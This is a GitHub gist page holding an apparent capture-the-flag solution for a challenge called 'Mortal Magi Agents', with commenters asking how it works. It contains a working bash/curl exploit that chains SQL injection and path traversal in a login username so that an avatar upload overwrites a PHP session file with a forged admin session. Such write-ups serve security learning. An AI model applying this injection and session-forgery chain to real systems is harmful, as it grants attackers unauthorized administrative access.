Last active
September 11, 2015 06:56
-
-
Save ytoku/8147cf145bc0cdc116d9 to your computer and use it in GitHub Desktop.
Mortal Magi Agents: intended exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TARGET_URL=http://localhost:10080 | |
| PASSWORD='' | |
| HASHED_PASSWORD=$(echo -n $PASSWORD | sha1sum | awk '{print $1}') | |
| COOKIEFILE=$(mktemp) | |
| SESSFILE=$(mktemp) | |
| echo -n 'user|s:1:"a";admin|b:1;' > $SESSFILE | |
| curl -s -c $COOKIEFILE "$TARGET_URL/login.php" -d "signin=&password=$PASSWORD&user=') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" >/dev/null | |
| curl -s -b $COOKIEFILE "$TARGET_URL/index.php?page=settings" -F "file=@$SESSFILE" >/dev/null | |
| curl -s -b "PHPSESSID=$(sha1sum $SESSFILE | awk '{print $1}')" "$TARGET_URL/index.php" | grep MMA | |
| rm $SESSFILE | |
| rm $COOKIEFILE |
avatar filename begin with username which you typed when you logged in.
So username will be "') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" and file will be uploaded to /var/lib/php5/sess_*.
This is php's session filename. Now, you can use the manipulated session which contains $_SESSION["admin"]==1.
Hi ytoku, great work. I want to ask you some details, how did you find the session structure? Did you use some tool or did it manually?
.
make a session with php and upload it :-)
i don't follow you, you have server code?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sorry, can you write up this challenge?
I'm a newbie and I can't understand the idea of this code T.T
Thank you very much.